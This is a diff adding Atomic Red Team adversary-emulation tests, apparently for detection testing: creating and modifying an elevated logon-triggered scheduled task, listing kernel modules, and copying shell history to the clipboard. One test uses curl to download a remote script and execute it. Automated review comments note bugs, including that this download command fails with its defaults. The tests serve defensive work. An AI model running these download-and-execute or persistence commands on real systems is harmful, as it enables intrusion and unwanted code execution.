diff --git a/atomics/T1053.005/T1053.005.yaml b/atomics/T1053.005/T1053.005.yaml
index 95363202..039fb5f8 100644
--- a/atomics/T1053.005/T1053.005.yaml
+++ b/atomics/T1053.005/T1053.005.yaml
@@ -179,3 +179,25 @@ atomic_tests:
 Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
 cleanup_command: |
 Unregister-ScheduledTask -TaskName "atomic red team" -confirm:$false >$null 2>&1
+- name: PowerShell Modify A Scheduled Task
+ description: |
+ Create a scheduled task with an action and modify the action to do something else. The initial idea is to showcase Microsoft Windows TaskScheduler Operational log modification of an action on a Task already registered.
+ It will first be created to spawn cmd.exe, but modified to run notepad.exe.
+
+ Upon successful execution, powershell.exe will create a scheduled task and modify the action.
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ $Action = New-ScheduledTaskAction -Execute "cmd.exe"
+ $Trigger = New-ScheduledTaskTrigger -AtLogon
+ $User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
+ $Set = New-ScheduledTaskSettingsSet
+ $object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
+ Register-ScheduledTask AtomicTaskModifed -InputObject $object
+ $NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
+ Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
+ cleanup_command: |
+ Unregister-ScheduledTask -TaskName "AtomicTaskModifed" -confirm:$false >$null 2>&1
\ No newline at end of file
diff --git a/atomics/T1082/T1082.yaml b/atomics/T1082/T1082.yaml
index 9524b68f..299bc5d2 100644
--- a/atomics/T1082/T1082.yaml
+++ b/atomics/T1082/T1082.yaml
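Review bot: `elevation_required: false` on the new test looks inconsistent with what the command registers: the principal is `BUILTIN\Administrators` with `-RunLevel Highest`, and registering a task that runs elevated under that group normally fails with access denied from a non-elevated PowerShell, so the flag should most likely be `elevation_required: true` (confirm on a non-admin session). The task name `AtomicTaskModifed` is misspelled; it is used consistently in `Register-ScheduledTask`, `Set-ScheduledTask` and the cleanup so the test still works, but renaming all three occurrences to `AtomicTaskModified` avoids confusion when correlating the test with TaskScheduler Operational log entries. The `-AtLogon` trigger means the registered task fires at every logon if the cleanup step is skipped; a sentence in the description pointing that out would help anyone running the test by hand.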
@@ -325,3 +325,13 @@ atomic_tests:
 remove-item $env:temp\$resultsfolder -recurse -force -erroraction silentlycontinue
 name: powershell
 elevation_required: true
+- name: Linux List Kernel Modules
+ description: |
+ Identify kernel modules installed. Upon successful execution stdout will display kernel modules installed on host.
+ supported_platforms:
+ - linux
+ executor:
+ command: |
+ sudo lsmod
+ sudo kmod list
+ name: sh
\ No newline at end of file
diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml
index 09356531..f8d4689a 100644
--- a/atomics/T1105/T1105.yaml
+++ b/atomics/T1105/T1105.yaml
@@ -715,3 +715,23 @@ atomic_tests:
 command: 'wscript.exe #{vbscript_file}'
 cleanup_command: del Atomic-License.txt >nul 2>&1
 name: command_prompt
+- name: Linux Download File and Run
+ description: |
+ Utilize linux Curl to download a remote file, chmod +x it and run it.
+ supported_platforms:
+ - linux
+ input_arguments:
+ remote_url:
+ description: url of remote payload
+ type: string
+ default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/
+ payload_name:
+ description: payload name
+ type: string
+ default: atomic.sh
+ executor:
+ command: |
+ curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name}
+ cleanup_command: |
+ del #{payload_name}
+ name: sh
\ No newline at end of file
diff --git a/atomics/T1105/src/atomic.sh b/atomics/T1105/src/atomic.sh
new file mode 100644
index 00000000..0c10cdf5
--- /dev/null
+++ b/atomics/T1105/src/atomic.sh
@@ -0,0 +1,2 @@
+#!/bin/bash
+echo "Hello From Atomic Red Team"
\ No newline at end of file
diff --git a/atomics/T1115/T1115.yaml b/atomics/T1115/T1115.yaml
index 12bcbf94..db5a617b 100644
--- a/atomics/T1115/T1115.yaml
+++ b/atomics/T1115/T1115.yaml
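Review bot: The new T1082 executor runs `sudo lsmod` and `sudo kmod list` but declares no `elevation_required`, unlike the `elevation_required: true` context line directly above it, so a non-interactive runner will either hang on a sudo password prompt or fail. `lsmod` reads `/proc/modules` and does not need root, so the simplest fix is to drop `sudo` from both lines; if root is intentionally kept, add `elevation_required: true` to the executor. `kmod list` is the same operation as `lsmod` (lsmod is kmod's list front end), so one of the two lines appears redundant and the description should say which output is expected.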
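Review bot: The T1105 command `curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name}` does not work with its own defaults: `remote_url` ends in `src/`, so `curl -O` has no remote filename to save to and exits with an error, the `;` then lets chmod and bash run even though nothing was downloaded, and piping chmod's empty stdout into bash does nothing useful. Because `-s` is used without `-f`, an HTTP error page would also be saved as `atomic.sh` and executed when the URL does resolve. Suggested replacement: `curl -sfO "#{remote_url}#{payload_name}" && chmod +x "#{payload_name}" && bash "#{payload_name}"`, which fetches the `atomics/T1105/src/atomic.sh` file this same commit adds. The cleanup uses `del #{payload_name}`, a Windows command; under the `sh` executor it should be `rm -f "#{payload_name}"`.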
@@ -69,3 +69,14 @@ atomic_tests:
 cleanup_command: |
 Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore
 name: powershell
+- name: Add or copy content to clipboard with xClip
+ description: |
+ Utilize Linux Xclip to copy history and place in clipboard then output to a history.txt file. Successful execution will capture history and output to a file on disk.
+ supported_platforms:
+ - linux
+ executor:
+ command: |
+ apt install xclip -y
+ history | tail -n 30 | xclip -sel clip
+ xclip -o > history.txt
+ name: sh
\ No newline at end of file
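Review bot: Under the `sh` executor `history` will not reflect the user's interactive history — a fresh non-interactive shell has an empty history list, and dash has no `history` builtin at all — so the clipboard and `history.txt` end up empty and the test does not demonstrate what its description promises; the description should state what content is actually expected to be copied, or the command should read a known input instead. `apt install xclip -y` needs root yet the executor declares no `elevation_required`, is Debian-specific, and `xclip` also needs an X display, so the dependency is better expressed as a prerequisite step than inline in the test command (check the repo's dependency convention for the exact fields). The test writes `history.txt` to the working directory with no `cleanup_command`, while the powershell test in the context lines removes its own output file; add `cleanup_command: rm -f history.txt` for consistency.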